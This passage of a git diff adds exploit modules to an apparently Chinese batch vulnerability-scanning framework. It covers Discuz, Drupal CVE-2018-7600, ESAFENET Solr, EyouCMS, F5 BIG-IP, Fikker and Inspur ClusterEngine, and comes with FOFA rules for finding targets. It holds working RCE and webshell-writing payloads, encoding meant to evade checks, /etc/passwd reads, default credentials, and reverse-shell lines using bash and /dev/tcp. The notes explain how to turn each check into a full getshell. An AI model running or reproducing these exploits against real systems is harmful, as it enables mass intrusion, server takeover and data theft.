+# 漏洞检测模块 +def poc(target): + result={} + try: + req = requests.get(target+'/robots.txt', headers=headers, timeout=3, verify=False) + if "Disallow" in req.text: + result['target'] = target + result['poc'] = NAME + result['xxx'] = '按需求随便写,删了都行' + return result + except: + pass +######################################################################################################################## + #以上为模板限制区域,以下为自由发挥区域 +######################################################################################################################## +# 漏洞利用模块 +def exp(target): + try: + req = requests.get(target+'/robots.txt', headers=headers, timeout=3, verify=False) + if "Disallow" in req.text: + print(req.text) + except: + pass + +if __name__ == '__main__': + exp('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Demo/Test.py b/Moudle/Demo/Test.py new file mode 100644 index 0000000..438d6c4 --- /dev/null +++ b/Moudle/Demo/Test.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers + +requests.packages.urllib3.disable_warnings() + + +######################################################################################################################## +# 脚本信息 +NAME='Test' +AUTHOR="RabbitMask" +REMARK='万能test' +FOFA_RULE='' +######################################################################################################################## +# 漏洞检测模块 +def poc(target): + result={} + try: + req = requests.get(target+'/admin/login/user.properties', headers=headers, timeout=3, verify=False) + result['target'] = target + result['poc'] = NAME + result['status'] = req.status_code + result['text'] = req.text + return result + except: + pass +######################################################################################################################## + #以上为模板限制区域,以下为自由发挥区域 +######################################################################################################################## +# 漏洞利用模块 +def exp(target): + try: + req = requests.get(target+'/robots.txt', headers=headers, timeout=3, verify=False) + if "Disallow" in req.text: + print(req.text) + except: + pass + +if __name__ == '__main__': + exp('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Discuz/discuz_version_change_getshell.md b/Moudle/Discuz/discuz_version_change_getshell.md new file mode 100644 index 0000000..923d0c2 --- /dev/null +++ b/Moudle/Discuz/discuz_version_change_getshell.md @@ -0,0 +1,89 @@ +# 1、漏洞描述 + +discuz! X系列的全版本,其产品升级/转换的功能存在漏洞,可利用构造的恶意语句,将shell写入到config.inc.php配置文件,从而实现getshell。 + +# 2、影响范围 + +discuz! X系列全版本 + +# 3、漏洞复现 + +漏洞利用的文件为utility/convert/index.php,选择其中一个版本,点击开始,抓取下一个页面的提交请求。 +![](images/image-20210903135314303.png) +![](images/image-20210903135652209.png) + +修改请求包的POST内容为如下,主要是修改红框中的内容: + +![](images/image-20210903135909982.png) + +``` +POST /Discuz_X3.2_SC_GBK/utility/convert/index.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 236 +Origin: http://127.0.0.1 +DNT: 1 +Connection: close +Referer: http://127.0.0.1/Discuz_X3.2_SC_GBK/utility/convert/index.php?a=config&source=d7.2_x2.0 +Upgrade-Insecure-Requests: 1 + +a=config&source=d7.2_x2.0&submit=yes&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(112).CHR(104).CHR(112).CHR(105).CHR(110).CHR(102).CHR(111).CHR(40).CHR(41).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaaaaaa +``` + +提交之后,相应的shell就写入到了/utility/convert/data/config.inc.php文件中,后面用蚁剑、冰蝎什么的连就可以了。 + +# 4、坑点 + +POST包中的source参数内容,为目标现在的版本,如果不对,提交请求会无效的。因版本比较多,手工党问题不大,但脚本批量的话,脚本中这个参数的值不多的话,大概率会漏报。 + +这里无论是漏洞利用的URL,还是最终写入到的URL中的文件,都有一个问题,那就是utility目录所在的位置,对于不同的站来说,很有可能不固定。网上下载的源码,这个目录是在网站根目录的上一级目录,手工的时候注意一下。脚本中是默认此目录在网站根目录了。 + +最重要的poc/exp的内容,其明文部分是eval("phpinfo();"); 只需要改双引号中的内容即可,比如shell为eval("$_POST['pass'];"); 但最终要转换为CHR类型的值。其中这个POST参数中的%0a%0d代表的是回车换行,在python中为\x0a\x0d,是为了躲避检查。CHR与STRING转换的脚本放在下面了。 + +# 5、CHR与STRING转换 + +## 5.1、CHR TO STRING + +``` +# _*_ coding:utf-8 _*_ + +import re + +list1 = [] +st = "CHR(60).CHR(63).CHR(112).CHR(104).CHR(112).CHR(32).CHR(101).CHR(99).CHR(104).CHR(111).CHR(32).CHR(39).CHR(97).CHR(98).CHR(99).CHR(39).CHR(59).CHR(63).CHR(62)" + +ss = re.findall('\((\d+)\)+',str(st)) +#print(ss) +for s in ss: + s = chr(int(s)) + list1.append(str(s)) + +s = "".join(list1) +print(s) +``` + +## 5.2、STRING TO CHR + +``` +# _*_ coding:utf-8 _*_ + + +list1 = [] +st = "" +for s in st: + chr_s = ord(s) + list1.append("CHR("+str(chr_s)+")") + +chr_ss = ".".join(list1) +print(chr_ss) +``` + +# 6、poc + +poc默认漏洞URL的主目录是在网站根目录下了,可能会有漏报,POST参数中的source,poc中已经尽可能的多写了,不排除会有漏报的情况出现。配合框架可批量,测试脚本可发现漏洞。 + +若要getshell,直接更改poc_key中的相关内容即可,漏洞复现中也有写。 diff --git a/Moudle/Discuz/discuz_version_change_getshell.py b/Moudle/Discuz/discuz_version_change_getshell.py new file mode 100644 index 0000000..ea2638f --- /dev/null +++ b/Moudle/Discuz/discuz_version_change_getshell.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='discuz_version_change_getshell' +AUTHOR="境心" +REMARK='discuz 版本转换功能getshell漏洞' +FOFA_RULE='app="Powered-by-Discuz!NT"' +FOFA_RULE='app="Tencent-Discuz"' ###这个也可以的 +###################################################### + +def poc(target): + result = {} + poc_key = 'newconfig[aaa\x0a\x0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(101).CHR(99).CHR(104).CHR(111).CHR(32).CHR(39).CHR(116).CHR(104).CHR(105).CHR(115).CHR(32).CHR(105).CHR(115).CHR(32).CHR(97).CHR(32).CHR(102).CHR(114).CHR(105).CHR(101).CHR(110).CHR(100).CHR(108).CHR(121).CHR(32).CHR(116).CHR(101).CHR(115).CHR(116).CHR(44).CHR(32).CHR(80).CHR(108).CHR(101).CHR(97).CHR(115).CHR(101).CHR(32).CHR(99).CHR(104).CHR(101).CHR(99).CHR(107).CHR(32).CHR(97).CHR(110).CHR(100).CHR(32).CHR(114).CHR(101).CHR(112).CHR(97).CHR(105).CHR(114).CHR(32).CHR(118).CHR(117).CHR(108).CHR(110).CHR(101).CHR(114).CHR(97).CHR(98).CHR(105).CHR(108).CHR(105).CHR(116).CHR(105).CHR(101).CHR(115).CHR(46).CHR(39).CHR(59).CHR(34).CHR(41).CHR(59));//]' + # utility目录在实际环境中的什么位置不确定,默认在网站根目录下,若不在网站根目录下的,会漏报 + vul_url = target+"/utility/convert/index.php" + # 经测试,这里source可以写多个,能匹配多个版本,又不影响getshell时的功能,source越多,漏报越少 + data = { + "a" :"config", + "source": "ss7.5_x2.0", + "source": "uch2.0_x2.0", + "source" : "d7.2_x2.0", + "source": "ss7.5_x1.5", + "source": "uch2.0_x1.0", + "source": "uch2.0_x1.5", + "source": "d7.2_x1.5", + "source": "d7.2_x1.0", + "source": "ss7.5_x1.0", + "submit" : "yes", + poc_key : "aaaa" + } + requests.post(vul_url, headers=headers, data=data, verify=False, timeout=5) + target_url = target+"/utility/convert/data/config.inc.php" + target_res = requests.get(target_url, headers=headers, verify=False, timeout=5) + if "this is a friendly test, Please check and repair vulnerabilities." in target_res.text: + result['poc_url'] = target_url + result['poc'] =NAME + result['message'] = "存在版本转换功能getshell漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1/Discuz_X3.2_SC_GBK/") \ No newline at end of file diff --git a/Moudle/Discuz/images/image-20210903135314303.png b/Moudle/Discuz/images/image-20210903135314303.png new file mode 100644 index 0000000..682b7ac Binary files /dev/null and b/Moudle/Discuz/images/image-20210903135314303.png differ diff --git a/Moudle/Discuz/images/image-20210903135652209.png b/Moudle/Discuz/images/image-20210903135652209.png new file mode 100644 index 0000000..417bfe3 Binary files /dev/null and b/Moudle/Discuz/images/image-20210903135652209.png differ diff --git a/Moudle/Discuz/images/image-20210903135909982.png b/Moudle/Discuz/images/image-20210903135909982.png new file mode 100644 index 0000000..830a0f4 Binary files /dev/null and b/Moudle/Discuz/images/image-20210903135909982.png differ diff --git a/Moudle/Drupal/CVE_2018_7600.py b/Moudle/Drupal/CVE_2018_7600.py new file mode 100644 index 0000000..b249eab --- /dev/null +++ b/Moudle/Drupal/CVE_2018_7600.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import re +import requests + +requests.packages.urllib3.disable_warnings() + +######################################################################################################################## +# 脚本信息 +NAME='CVE_2018_7600' +AUTHOR="RabbitMask" +REMARK='Drupal 7 RCE' +FOFA_RULE='app="Drupal-7"' +######################################################################################################################## +# 漏洞检测模块 +def poc(target): + result={} + cmd='whoami' + get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': cmd} + post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'} + try: + r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False) + rule1 = re.compile(r'') + form_build_id = rule1.findall(r.text) + if form_build_id: + get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]} + post_params = {'form_build_id':form_build_id[0]} + r = requests.post(target, params=get_params, data=post_params, verify=False) + rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?') + parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t','')) + if parsed_result and len(parsed_result[0])>0 and len(parsed_result[0])<100: + result['target']=target + result['poc']=NAME + result['whoami']=str(parsed_result[0]) + return result + except: + pass +######################################################################################################################## + #以上为模板限制区域,以下为自由发挥区域 +######################################################################################################################## +# 漏洞利用模块 +def exp(target,cmd): + get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': cmd} + post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'} + try: + r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False) + rule1 = re.compile(r'') + form_build_id = rule1.findall(r.text) + if form_build_id: + get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]} + post_params = {'form_build_id':form_build_id[0]} + r = requests.post(target, params=get_params, data=post_params, verify=False) + rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?') + parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t','')) + if parsed_result and len(parsed_result[0])>0: + print(target,'Drupal-7',parsed_result[0]) + except: + pass + + + +if __name__ == '__main__': + exp('http://127.0.0.1') \ No newline at end of file diff --git a/Moudle/ESAFENET/CNVD_2021_26058.py b/Moudle/ESAFENET/CNVD_2021_26058.py new file mode 100644 index 0000000..2310d89 --- /dev/null +++ b/Moudle/ESAFENET/CNVD_2021_26058.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import re +from Config.config_requests import headers + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME = 'CNVD_2021_26058' +AUTHOR = "JDQ" +REMARK = '亿赛通电子文档安全管理系统远程命令执行漏洞' +FOFA_RULE = 'title="电子文档安全管理系统"' +###################################################### + + +def poc(target): + try: + r = requests.get(target+"/solr/admin/cores",headers=headers, verify=False) + if r.status_code == 200 and 'responseHeader' in r.text: + result = re.search( + r'([\s\S]*?)', r.text, re.I + ) + core_name = result.group(1) + return(POC_2(target, core_name)) + except : + pass + + +def POC_2(target, core_name): + result={} + url = target + \ + "/solr/"+ core_name + "/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20" + files = { + 'stream.body': ''' + + + ''' + } + + try: + r = requests.post(url, data=files, verify=False) + if r.status_code == 200 and 'responseHeader' in r.text: + cmd = re.search( + r'documents">([\s\S]*?)', r.text, re.I) + res = cmd.group(1) + result['target'] = target + result['poc'] = NAME + result['whoami'] = res + return result + except: + pass + +if __name__ == '__main__': + poc("127.0.0.1") diff --git a/Moudle/EyouCMS/EyouCMS_qiantai_rce.md b/Moudle/EyouCMS/EyouCMS_qiantai_rce.md new file mode 100644 index 0000000..22e07a4 --- /dev/null +++ b/Moudle/EyouCMS/EyouCMS_qiantai_rce.md @@ -0,0 +1,79 @@ +# 1、漏洞描述 + +eyoucms V1.4.0版本存在远程命令执行漏洞,在网站前台无需任何辅助,可直接写入webshell。 + +漏洞影响版本只有一个,实际环境中能不能遇到,看脸了。。 + +# 2、影响范围 + +1.4.0单一版本 + +# 3、漏洞复现 + +## 3.1、坑点 + +先上POST包,提交后就在网站根目录下生成了testtest.php的poc文件: + +``` +POST /EyouCMS-V1.4.1-UTF8-SP2/?m=api&c=ajax&a=get_tag_memberlist HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-type: application/x-www-form-urlencoded +DNT: 1 +Connection: close +Cookie: PHPSESSID=q28egmgkmmogh09pm1gn9n2bj2; home_lang=cn; admin_lang=cn +Upgrade-Insecure-Requests: 1 +Content-Length: 297 + +attarray=eyJ7cGhwfTEyM3svcGhwfSI6ICJ7cGhwfWZpbGVfcHV0X2NvbnRlbnRzKCcuL3Rlc3R0ZXN0LnBocCcsYmFzZTY0X2RlY29kZShiJ1BEOXdhSEFnWldOb2J5QWlkR2hwY3lCcGN5QmhJR1p5YVdWdVpHeDVJSFJsYzNRc0lGQnNaV0Z6WlNCamFHVmpheUJoYm1RZ2NtVndZV2x5SUhWd2JHOWhaQ0IyZFd4dVpYSmhZbWxzYVhScFpYTXVJajgrJykpO3svcGhwfSJ9&htmlcode=111111 +``` + +如下图,注意箭头标的几个位置,POST方法、URL、X-Requested-With、attarray参数内容,尤其是X-Requested-With和attarray参数内容(payload),payload生成方法后面详说。 + +坑点在这: + +1. 若不是用的post方法,会失败; +2. URL中?后面的内容一定要按图中的这样写; +3. 请求的header中,X-Requested-With: XMLHttpRequest 一定要有,否则手工验证的时候,即使返回的读取成功,但还是没有写入成功shell; +4. payload生成过程踩过坑了,按下面3.2中的方法生成即可; + +![](image-20210908095353384.png) + +## 3.2、生成payload + +根据源码中的漏洞细节,其中eval会被替换为intval,需要将webshell进行base64加密传输绕过检测,同时构造将webshell写入目标机器的payload,将php标签转换为{php},将payload转换为数组格式,然后将数组转换为json格式,最后对其base64加密,生成最终的payload。 + +先看一下怎么用php生成这样的一个payload,上代码: + +=>符号左边的是数组名,可自定义;右边的是实际的payload,这里是写的一句话。 + +``` +"{php}file_put_contents('./testtest.php',base64_decode('PHBocCBldmFsKCRfUkVRVUVTVFtjZXNoaV0pOz8+'));{/php}"))); +``` + +再看一下python如何生成这样的一个payload,上代码: + +过程都是一样的。 + +``` +def creat_payload(): + payload_tmp1 = '''''' + payload_tmp1_base64 = base64.b64encode(payload_tmp1.encode('utf-8')) + payload_tmp2 = { + "{php}123{/php}": "{php}file_put_contents('./testtest.php',base64_decode(" + str( + payload_tmp1_base64) + "));{/php}" + } + payload = base64.b64encode(json.dumps(payload_tmp2).encode('utf-8')) + return payload +``` + +不过这里php生成的payload中,解密来看的话,/会被转义,即\/,但不影响实际效果。 + +# 4、poc + +搭配框架可批量,若要getshell,替换脚本中的payload_tmp1内容即可。 \ No newline at end of file diff --git a/Moudle/EyouCMS/EyouCMS_qiantai_rce.py b/Moudle/EyouCMS/EyouCMS_qiantai_rce.py new file mode 100644 index 0000000..f1f3fb4 --- /dev/null +++ b/Moudle/EyouCMS/EyouCMS_qiantai_rce.py @@ -0,0 +1,52 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import base64 +import json +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='EyouCMS_qiantai_rce' +AUTHOR="境心" +REMARK='易优CMS前台RCE' +FOFA_RULE='app="eyoucms"' +###################################################### + +def creat_payload(): + payload_tmp1 = '''''' + payload_tmp1_base64 = base64.b64encode(payload_tmp1.encode('utf-8')) + payload_tmp2 = { + "{php}123{/php}": "{php}file_put_contents('./testtest.php',base64_decode(" + str( + payload_tmp1_base64) + "));{/php}" + } + payload = base64.b64encode(json.dumps(payload_tmp2).encode('utf-8')) + return payload + +def poc(target): + result = {} + url = target + "/?m=api&c=ajax&a=get_tag_memberlist" + headers = { + "User-Agent" : ua, + "X-Requested-With": "XMLHttpRequest", + "Content-type": "application/x-www-form-urlencoded" # 手工必须要有,脚本可以不用 + } + data = { + "attarray" : creat_payload(), + "htmlcode" : "testtest" + } + res = requests.post(url, data=data, headers=headers, verify=False, timeout=5) + if "this is a friendly test" in res.text: + result['message'] = "存在eyoucms前台RCE漏洞" + result['poc_url'] = target+"/testtest.php" + return result + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1/EyouCMS-V1.4.0-UTF8-SP2/index.php/") diff --git a/Moudle/EyouCMS/image-20210908095353384.png b/Moudle/EyouCMS/image-20210908095353384.png new file mode 100644 index 0000000..bb98b64 Binary files /dev/null and b/Moudle/EyouCMS/image-20210908095353384.png differ diff --git a/Moudle/F5/CVE_2020_5902.py b/Moudle/F5/CVE_2020_5902.py new file mode 100644 index 0000000..859c959 --- /dev/null +++ b/Moudle/F5/CVE_2020_5902.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import json +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE-2020-5902' +AUTHOR="Joker" +REMARK='F5 BIG-IP 远程代码执行漏洞1' +FOFA_RULE='title="BIG-IP® ;- Redirect"或icon_hash="-335242539"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" + # 其他漏洞触发点 + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release + #https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp + #https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami + #https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin + # 反弹shell + # https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash + # https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/1.txt&content=bash+-i+>%26/dev/tcp/127.0.0.1/4444+0>%261 + # https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/1.txt + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", + "Accept-Language":"zh-CN,zh;q=0.9" + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + + if "output" in r.text and r.status_code==200: + c = json.loads(r.text)["output"] + result['target'] = target + result['poc'] = NAME + result['data'] = c + return result + else: + pass + except Exception as e: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1/") \ No newline at end of file diff --git a/Moudle/F5/CVE_2021_22986.py b/Moudle/F5/CVE_2021_22986.py new file mode 100644 index 0000000..829a944 --- /dev/null +++ b/Moudle/F5/CVE_2021_22986.py @@ -0,0 +1,41 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import json +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE-2021-22986' +AUTHOR="Joker" +REMARK='F5 BIG-IP 远程代码执行漏洞2' +FOFA_RULE='title="BIG-IP® ;- Redirect"或icon_hash="-335242539"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/mgmt/tm/util/bash" + headers = { + "Authorization": "Basic YWRtaW46QVNhc1M=", + "X-F5-Auth-Token": "", + "Content-Type": "application/json" + } + data = '{"command":"run","utilCmdArgs":"-c id"}' + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url=vuln_url, data=data,headers=headers, verify=False, timeout=5) + if "commandResult" in r.text and r.status_code == 200: + c = json.loads(r.text)["commandResult"] + result['target'] = target + result['poc'] = NAME + result['data'] = c + return result + else: + pass + except Exception as e: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1/") \ No newline at end of file diff --git a/Moudle/Fikker/Fikker_admin.py b/Moudle/Fikker/Fikker_admin.py new file mode 100644 index 0000000..2d9dd4a --- /dev/null +++ b/Moudle/Fikker/Fikker_admin.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import json +import requests +from Config.config_requests import ua + +# 脚本信息 +###################################################### +NAME='Fikker_admin' +AUTHOR="Trans" +REMARK='fikker Console default password' +FOFA_RULE='title=="转向 Fikker 管理平台"' +###################################################### + +def poc(target): + result={} + headers ={ + "User-Agent":ua, + "Content-Type":"text/plain;charset=UTF-8", + "Origin": target, + "Referer": target+"/fikker/", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9" + } + + data = { + "RequestID":"LOGIN", + "Username":"admin", + "Password":"123456" + } + + try: + target += "/fikker/webcache.fik?type=sign&cmd=in" + r = requests.post(target ,headers = headers,data = data,verify=False,timeout=40) + if r.status_code == 200 : + text = json.loads(r.text) + if text['Return'] == "True": + result['target'] = target + result['poc'] = NAME + result['username'] = 'admin' + result['password'] = '123456' + return result + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1:6780") + diff --git a/Moudle/Inspur/CVE_2020_21224.md b/Moudle/Inspur/CVE_2020_21224.md new file mode 100644 index 0000000..13b4e0c --- /dev/null +++ b/Moudle/Inspur/CVE_2020_21224.md @@ -0,0 +1,76 @@ +# 1、漏洞介绍 +浪潮 ClusterEngineV4.0 任意命令执行 +登录处抓包,然后闭合username字段重发引发报错 +远程攻击者可以将恶意登录数据包发送到控制服务器 +# 2、漏洞版本 +浪潮ClusterEngine V4.0 +# 3、fofa搜索 +title="TSCEV4.0" +# 4、漏洞利用 + +``` +# POC测试(出现 root:x:0:0 则存在漏洞) + +op=login&username=Wings`$(cat /etc/passwd)` +{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user Wings does not exist\nerror:1\n"} + +# 反弹shell +op=login&username=Wings`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)` +``` + +登陆闭合字段username、执行命令并没有成功 +``` +POST /login HTTP/1.1 +Host: 127.0.0.1:8443 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 60 +Origin: https://127.0.0.1:8443 +Connection: close +Referer: https://127.0.0.1:8443/module/login/login.html +Cookie: lang=cn + +op=login&username=admin'ping xxxxxx.dnslog.cn&password=admin + +HTTP/1.1 200 +Content-Type: text/json;charset=utf-8 +Date: Tue, 13 Apr 2021 06:40:42 GMT +Connection: close +Content-Length: 159 + +{"err":"/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n","exitcode":1,"out":""} +``` + + + +按照漂亮鼠星球思路可以,未做过滤,通过;可拼接命令 +``` +POST /alarmConfig HTTP/1.1 +Host: 127.0.0.1:8443 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 55 +Origin: https://127.0.0.1:8443 +Connection: close +Referer: https://127.0.0.1:8443/module/login/login.html +Cookie: lang=cn + +op=testPhone&alarmTestPhone=1;whoami&alarmTestMessage=2 + + +HTTP/1.1 200 +Content-Type: text/json;charset=utf-8 +Date: Tue, 13 Apr 2021 06:52:47 GMT +Connection: close +Content-Length: 1459 + +{"def":"root","erInfo":"./lt-gnokii: line 199: cd: /mnt/hgfs/share/alarm/ex_alarm_tstor/gnokii/gnokii-0.6.31/gnokii: No such file or directory\ngcc: error: gnokii-gnokii.o: No such file or directory\ngcc: error: gnokii-gnokii-calendar.o: No such file or directory\ngcc: error: gnokii-gnokii-dial.o: No such file or directory\ngcc: error: gnokii-gnokii-file.o: No such file or directory\ngcc: error: gnokii-gnokii-logo.o: No such file or directory\ngcc: error: gnokii-gnokii-mms.o: No such file or directory\ngcc: error: gnokii-gnokii-monitor.o: No such file or directory\ngcc: error: gnokii-gnokii-other.o: No such file or directory\ngcc: error: gnokii-gnokii-phonebook.o: No such file or directory\ngcc: error: gnokii-gnokii-profile.o: No such file or directory\ngcc: error: gnokii-gnokii-ringtone.o: No such file or directory\ngcc: error: gnokii-gnokii-security.o: No such file or directory\ngcc: error: gnokii-gnokii-settings.o: No such file or directory\ngcc: error: gnokii-gnokii-sms.o: No such file or directory\ngcc: error: gnokii-gnokii-todo.o: No such file or directory\ngcc: error: gnokii-gnokii-utils.o: No such file or directory\ngcc: error: gnokii-gnokii-wap.o: No such file or directory\ngcc: error: ../common/.libs/libgnokii.so: No such file or directory\ngcc: error: ../getopt/libgetopt.a: No such file or directoryn","cmd":"cd /var/tsced/tools/;./lt-gnokii --config ../config/sms.cf --dialvoice 1;whoami","status":"ok","info":"测试成功"} +``` diff --git a/Moudle/Inspur/CVE_2020_21224.py b/Moudle/Inspur/CVE_2020_21224.py new file mode 100644 index 0000000..1c8a85f --- /dev/null +++ b/Moudle/Inspur/CVE_2020_21224.py @@ -0,0 +1,67 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +import json +import requests +from Config.config_requests import ua + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME='CVE_2020_21224' +AUTHOR="RabbitMask" +REMARK='Inspur 